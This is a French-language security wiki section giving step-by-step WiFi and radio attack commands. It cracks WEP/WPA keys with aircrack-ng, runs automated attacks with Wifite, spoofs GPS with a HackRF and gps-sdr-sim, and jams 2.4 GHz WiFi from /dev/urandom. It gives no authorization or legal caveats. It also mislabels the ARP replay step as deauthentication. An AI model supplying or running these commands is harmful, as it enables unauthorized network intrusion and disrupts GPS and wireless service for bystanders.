# WiFi

# [Exploitation/Wifi] Drivers AWUS1900

## Introduction

La carte wifi **AWUS1900** nécessite l'installation du driver **rtl8814au** pour fonctionner.

## Installation

#### Kali Linux

```bash
sudo apt install dkms build-essential libelf-dev linux-headers-`uname -r` && cd /tmp && git clone https://github.com/aircrack-ng/rtl8814au && cd rtl8814au && sudo make dkms_install
```

# [Exploitation/WiFi] Aircrack-ng

## Introduction

La suite d'outils **Aircrack-ng** permettent d'attaquer des réseaux wifi. L'outil est installé par défaut sur Kali Linux.

## ![image.png](https://wiki.neopipe.fr/uploads/images/gallery/2023-10/scaled-1680-/AELimage.png)

## Sources

- [Cartes wifi compatibles](https://www.kali-linux.fr/cartes-wifi-compatibles)

## Prérequis

1. Une carte réseau wifi avec les chipsets suivants :

- Atheros AR9271
- Ralink RT3070
- Ralink RT3572
- Ralink RT5572
- Realtek RTL8812AU
- Ralink RT5370N

## Manuel

Les réseaux sans-fil WEP sont très mal sécurisés ce qui permet de les exploiter très facilement et ne prend généralement pas plus de quelques minutes.

Affichez les interfaces réseaux wifi utilisables pour votre attaque :

```bash
sudo airmon-ng
```

Commencez par éteindre l'interface de votre carte réseau wifi :

```bash
sudo airmon-ng stop <IFACE>
```

Passez-la en mode moniteur :

```bash
sudo airmon-ng start <IFACE>
```

Démarrez l'interface :

```
sudo ip link set <IFACE> up
```

Scannez les réseaux wifi des environs :

```bash
sudo airodump-ng --write <FILE> <IFACE>
```

<p class="callout info">Les résultats seront stockés dans le fichier spécifié.</p>

Désormais, mettez de côté le **BSSID** (adresse MAC du point d'accès) ainsi que le **ESSID** (nom affiché) du point d'accès que vous souhaitez cibler.

Maintenant ce qui est intéressant c'est de récupérer l'adresse MAC d'un hôte connecté sur ce réseau :

```bash
sudo airodump-ng <IFACE> --write <FILE> -channel <CHANNEL> --bssid <BSSID>
```

Lorsque vous aurez mis de côté une adresse MAC, fermez airodump et préparez deux terminaux.

Lancez la commande suivante dans le premier terminal afin de bombarder la cible avec des paquets de désauthentification :

```bash
sudo aireplay-ng -3 -e <ESSID> -b <BSSID> -h <HOST_MAC> <IFACE>
```

<p class="callout info">On peut aussi utiliser l'option **-x** afin de spécifier une vitesse de l'injection de paquet. Par défaut cette vitesse est définie à 600 paquets par seconde mais il est recommandé d'augmenter si vous êtes vraiment proche du point d'accès afin de capturer davantage d'**IVs**, et au contraire il est recommandé de le diminuer si vous êtes loin pour éviter de faire planter le point d'accès.</p>

Dans le second terminal, lancez la commande suivante en remplaçant les options par les fichiers capturés par aireplay :

#### WEP

```bash
aircrack-ng -x <FILE.cap> <FILE.ivs>
```

#### WPA

```bash
aircrack-ng -a2 -b <BSSID> -w <WORDLIST> <FILE.cap>
```

# [Exploitation/Wifi] Wifite

## Introduction

L'outil Wifite permet d'effectuer des attaques sur les réseaux wifi de manière simple et automatisée.

Par défaut, il est installé sur Kali Linux.

[![image.png](https://wiki.neopipe.fr/uploads/images/gallery/2024-01/scaled-1680-/image.png)](https://wiki.neopipe.fr/uploads/images/gallery/2024-01/image.png)

## Outils complémentaires

Pour pouvoir bénéficier de tout le panel d'attaques que propose Wifite, il vous faudra installer deux paquets supplémentaire :

```bash
sudo apt install -y hcxdumptool hcxtools
```

## Manuel

```bash
sudo wifite
```

# [Exploitation/Wifi] HackrfOne

## Introduction

Ce boitier permet d'effectuer diverses attaques sur les ondes radios.

![image.png](https://wiki.neopipe.fr/uploads/images/gallery/2025-04/scaled-1680-/1vLimage.png)

## Manuel

#### Firmwares

Téléchargez les firmwares .bin à cette adresse :

- [https://github.com/greatscottgadgets/hackrf/releases/](https://github.com/greatscottgadgets/hackrf/releases/)

Puis balancez le firmware sur l'équipement après l'avoir branché en USB :

```bash
hackrf_spiflash -Rw hackrf_one_usb.bin
```

#### Fake GPS

Cette technique permet d'envoyer un faux signal GPS aux appareils environnants.

Tout d'abord, installez le paquet **hackrf** :

```bash
sudo apt install hackrf
```

Puis connectez le boitier et vérifier qu'il soit détecté avec la commande suivante :

```bash
hackrf_info
```

Ensuite, clonez ce dépôt :

```bash
git clone https://github.com/osqzss/gps-sdr-sim.git
```

Compilez pour obtenir le binaire :

```bash
make
```

Puis téléchargez la dernière éphéméride sur le site de la NASA :

- [https://cddis.nasa.gov/archive/gnss/data/daily/2025/brdc/](https://cddis.nasa.gov/archive/gnss/data/daily/2025/brdc/)

 Et lancez l'outil pour générer un fichier **gpssim.bin** à partir d'une position GPS :

```bash
./gps-sdr-sim -b 8 -e brdc3540.21n -l 48.858844,2.294351,100
```

Puis lancez hackrf pour propager les ondes :

```bash
hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 40
```

#### Jamming

Pour brouiller un signal wifi :

```bash
hackrf_transfer -t /dev/urandom -f 2442000000 -s 20000000 -a 1
```